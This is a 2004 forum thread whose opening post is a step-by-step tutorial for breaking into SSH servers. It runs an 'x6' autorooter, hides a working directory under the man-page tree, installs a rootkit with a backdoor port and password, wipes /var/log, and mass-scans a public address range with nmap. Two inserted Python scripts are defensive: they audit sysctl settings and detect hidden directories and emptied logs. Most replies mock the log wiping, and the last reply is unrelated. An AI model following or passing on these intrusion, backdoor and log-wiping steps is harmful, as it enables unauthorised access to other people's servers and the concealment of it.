Government Security
Network Security Resources

Ssh Scanning And Hacking

shell ips ssh port scan rootkit stealth fingerprinting tutorial
6 replies to this topic

#1 prof



  • Members
  • 5 posts

Posted 07 September 2004 - 06:20 AM

SSH Scanning and Hacking
First, we need some tools
secureCRT (https://secure.vandy...=SecureCRT_beta)
A SSH Client to connect to an SSH box.. With this
version u can SSH with a proxy

LNX r00tkit (
a rootkit, best there is i think.. Very easy to use..
Only needed in last step

X6 (
The Autorooter..

First, you gotta have a scan with vulnerable IPs (or just
one)
Almost always works for exploiting..

Let's say we got an IP, and a shell..
Connect to your shell and type :
it downloads the autorooter to the shell..
When its done, Type : tar xzvf x6.tgz
Then type cd x6

When in the dir, type : ./x6 -t#
it shows u all the Exploitable SSH Versions.. Let's say we got an
exploitable SSH-1.99-OpenSSH-2.1.1 (target 123 on the list)
The IP =
you type :
./x6 -t123

Now it says something like : ATTACH NOW..
Wait 6 Seconds then push Enter.. Normally it starts
exploiting, it says like
1. 0x0000000 . . [SEGV]
2. 0x00000c4 . . [SURVIVED]
Something like that..

Just let it go and it will exploit your box..

If it doesn't go to 1. ..., and it says FATAL: no
it's not vulnerable

Then, when it exploited the box, u get some thing like :
no crash been found
Rem from Remote : CHRIS CHRIS

*** YOU ARE IN ***
Boxhost blahblah

then type the following
cd /usr/man/man3/
and then :
mkdir ". hiden"
and then :
cd "..."
This is a hidden dir so the Sysop won't notice

Now we r going to download the Rootkit
type :
It will start downloading..
When done, type : tar xzvf lnx.gz
and then:
cd lnx

Then, we r going to start it..
Lets say u want password "poop" on port 25374
then u type :
./own poop 25374

It Installs the Rootkit, and Done !! Connect to the ip
with port 25374 (or the one u too
Username = root
and u gave the password urself..

now CLEANIN (for no traces):

rm -rf /var/logs/*

USE nmap

for SSH scanz

nmap -O -sS -p 20-23,80,443 '194.65.*.*' > FILE.OUTPUT

-O means guess remote OS
-sS tcp syn stealth
-p ports to scan (WE include ftp telnet and ssh and HTTP and secure http)
and finally the nets '194.65.*.*' it will scan from

have PHUnz

Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use '-' for stdin
* -S /-e Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O '192.88-90.*.*'

Protecting your box to rehackers (IMPORTANT !!)

Before scanin or haxin I would recommend to change thiz vars.

its very easy

works on all linux versions..

just make a shell ****** with vi ::

echo Protectin ur Env to a safe hax W0rk
echo LOL.dDwAx
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
echo 1 > /proc/sys/net/ipv4/conf/default/hidden
echo 1 > /proc/sys/net/ipv4/conf/default/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/default/forwarding
echo 1 > /proc/sys/net/ipv4/conf/default/log_martians
echo 1 > /proc/sys/net/ipv4/conf/default/rp_filter
echo 1 > /proc/sys/net/ipv4/conf/eth0/hidden
echo 1 > /proc/sys/net/ipv4/conf/eth0/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/eth0/forwarding
echo 1 > /proc/sys/net/ipv4/conf/eth0/log_martians
echo 1 > /proc/sys/net/ipv4/conf/eth0/rp_filter
echo Done
echo now use ur nmap or ur exploits and have phunz
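
Added example, not part of prof's post or of any project: an audit that reads the same /proc/sys/net/ipv4 knobs the script above writes and compares them with a baseline for a host that is not a router. It is written in Python for this page. The baseline values and the reasons attached to them are this example's assumption of a sensible default (syncookies, rp_filter and log_martians on; forwarding and proxy_arp off), `proc_sys_root` is a parameter so the audit can be pointed at a constructed tree instead of the live /proc/sys, and `apply_post_script` is a constructed fixture that reproduces what the script leaves behind. The `hidden` knob is left out of the baseline because it comes from an out-of-tree patch and does not exist on a mainline kernel.

```python
import tempfile
from pathlib import Path

# Baseline for a host that is not a router. Expected values and the reasons
# are this example's assumption of a sensible default, not taken from the post.
HOST_WIDE = [
    ("net/ipv4/tcp_syncookies", "1", "SYN cookies keep sshd reachable under a SYN flood"),
]
PER_INTERFACE = [
    ("rp_filter", "1", "drop packets whose source would not route back via this interface"),
    ("log_martians", "1", "log packets with impossible source addresses"),
    ("forwarding", "0", "a host that is not a router must not forward"),
    ("proxy_arp", "0", "answering ARP for other hosts is a gateway feature, off by default"),
]
# The "hidden" knob the post's script writes is not checked: it comes from an
# out-of-tree patch and does not exist on a mainline kernel.


def audit_sysctl(proc_sys_root, interfaces=("default", "eth0")):
    """Read each knob under proc_sys_root (normally /proc/sys) and return
    (relative_path, status, actual, expected, why) tuples, with status one
    of "ok", "mismatch" or "absent"."""
    root = Path(proc_sys_root)
    checks = list(HOST_WIDE)
    for iface in interfaces:
        for knob, expected, why in PER_INTERFACE:
            checks.append((f"net/ipv4/conf/{iface}/{knob}", expected, why))
    findings = []
    for rel, expected, why in checks:
        path = root / rel
        if not path.is_file():
            findings.append((rel, "absent", None, expected, why))
            continue
        actual = path.read_text().strip()
        status = "ok" if actual == expected else "mismatch"
        findings.append((rel, status, actual, expected, why))
    return findings


def mismatches(findings):
    """Sorted relative paths whose current value differs from the baseline."""
    return sorted(f[0] for f in findings if f[1] == "mismatch")


def apply_post_script(proc_sys_root):
    """Constructed fixture: writes the value 1 into exactly the files the post's
    script echoes into, under a fake /proc/sys so the audit can run offline."""
    root = Path(proc_sys_root)
    files = ["net/ipv4/tcp_syncookies"]
    for iface in ("default", "eth0"):
        for knob in ("hidden", "proxy_arp", "forwarding", "log_martians", "rp_filter"):
            files.append(f"net/ipv4/conf/{iface}/{knob}")
    for rel in files:
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text("1\n")
    return root


def run_on_fixture():
    """Build the fixture in a temporary directory and audit it."""
    return audit_sysctl(apply_post_script(tempfile.mkdtemp(prefix="procsys_")))


if __name__ == "__main__":
    for rel, status, actual, expected, why in run_on_fixture():
        if status != "ok":
            print(f"{status:8} {rel}: is {actual!r}, baseline {expected!r} ({why})")
```

Run against the fixture, the audit reports forwarding and proxy_arp as mismatches on both interfaces: the script turns the box into a forwarding, proxy-ARP host, which is a router configuration rather than a hardening step, while its syncookies, rp_filter and log_martians settings do match the baseline. Pointing `audit_sysctl` at `/proc/sys` on a real host needs no other change.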

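Added example, not part of prof's post: the two artifacts the post leaves on a compromised host, a directory under the man page tree whose name is dots and whitespace, and an emptied log directory, are easy to sweep for. The script below is Python written for this page; the sample tree it builds is constructed, and the one assumption is that the deceptive-name pattern it flags (names made only of dots and whitespace, or a dot followed by whitespace) is the right net for a first pass, so ordinary dotdirs such as `.config` are left alone.

```python
import os
import re
import tempfile
from pathlib import Path

# Names made only of dots and whitespace ("...", ". ") or a dot followed by
# whitespace (". hiden") look like nothing, or like "." and "..", in a casual
# `ls -la`, which is why they get used for drop directories.
# Assumption: this pattern is what the sweep should flag; ".config" is not.
SUSPICIOUS_NAME = re.compile(r"^(?:[.\s]+|\.\s.*)$")


def suspicious_dirs(root):
    """Return sorted paths (relative to root, POSIX style) of directories
    whose names match SUSPICIOUS_NAME."""
    root = Path(root)
    hits = []
    for dirpath, dirnames, _files in os.walk(root):
        for name in dirnames:
            if SUSPICIOUS_NAME.match(name):
                hits.append((Path(dirpath) / name).relative_to(root).as_posix())
    return sorted(hits)


def log_dir_emptied(log_dir):
    """True when the log directory exists but holds nothing at all, the state
    `rm -rf /var/log/*` leaves behind. A missing directory is a different
    finding, so that returns False."""
    p = Path(log_dir)
    return p.is_dir() and not any(p.iterdir())


def build_sample_tree():
    """Constructed sample tree mirroring the layout the post describes,
    plus benign names that must not be reported."""
    base = Path(tempfile.mkdtemp(prefix="sshaudit_"))
    (base / "usr" / "man" / "man3" / ". hiden").mkdir(parents=True)
    (base / "usr" / "man" / "man3" / "...").mkdir(parents=True)
    (base / "home" / "alice" / ".config").mkdir(parents=True)  # benign dotdir
    (base / "var" / "log").mkdir(parents=True)                 # wiped
    (base / "var" / "log_ok").mkdir(parents=True)              # intact
    (base / "var" / "log_ok" / "messages").write_text(
        "Sep  7 06:20:01 host sshd[123]: Accepted password for alice\n"  # constructed line
    )
    return base


if __name__ == "__main__":
    sample = build_sample_tree()
    for rel in suspicious_dirs(sample):
        print("suspicious directory:", rel)
    print("log dir emptied:", log_dir_emptied(sample / "var" / "log"))
```

On a real host, `suspicious_dirs("/usr")` and `log_dir_emptied("/var/log")` are the calls to make; an emptied log directory is itself the alert, since a healthy system never has one, which is the point Tyrano and Blight make in the replies.
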
#2 Tyrano


    Staff Sergeant

  • Members
  • 296 posts

Posted 07 September 2004 - 08:14 AM

i think someone might notice if all of the logs are gone. :P

#3 M4Z3R


    Private First Class

  • Members
  • 96 posts

Posted 07 September 2004 - 09:07 AM

Thx Teacher for this little tut, I'll maybe have a try on my local distro ;)

#4 Stephen79


    Staff Sergeant

  • Sergeant Major
  • 349 posts

Posted 07 September 2004 - 09:23 AM

Also saw this exact same thing word for word here:

http://members.lycos.....H Hacking.txt

Not all the links are active there either :P

#5 Stephen79


    Staff Sergeant

  • Sergeant Major
  • 349 posts

Posted 07 September 2004 - 09:27 AM

oh, and if you root it (step back) there are many more.

http://members.lycos...xp/For A Board/

#6 Blight



  • Members
  • 4 posts

Posted 07 September 2004 - 10:55 AM

Deleting all /var/log would be a bit stupid, I think :) Maybe only if you hope that the admin is blind :)

Do u still find such old sshd versions?

#7 sajid89



  • Members
  • 9 posts

Posted 02 May 2012 - 02:53 AM

The only time arch loses over another distro is in terms of complex configurations. The only times I don't use arch is when I need an extremely complex system, then I use BSDs.. but for complex linux systems, I go gentoo or Slackware.
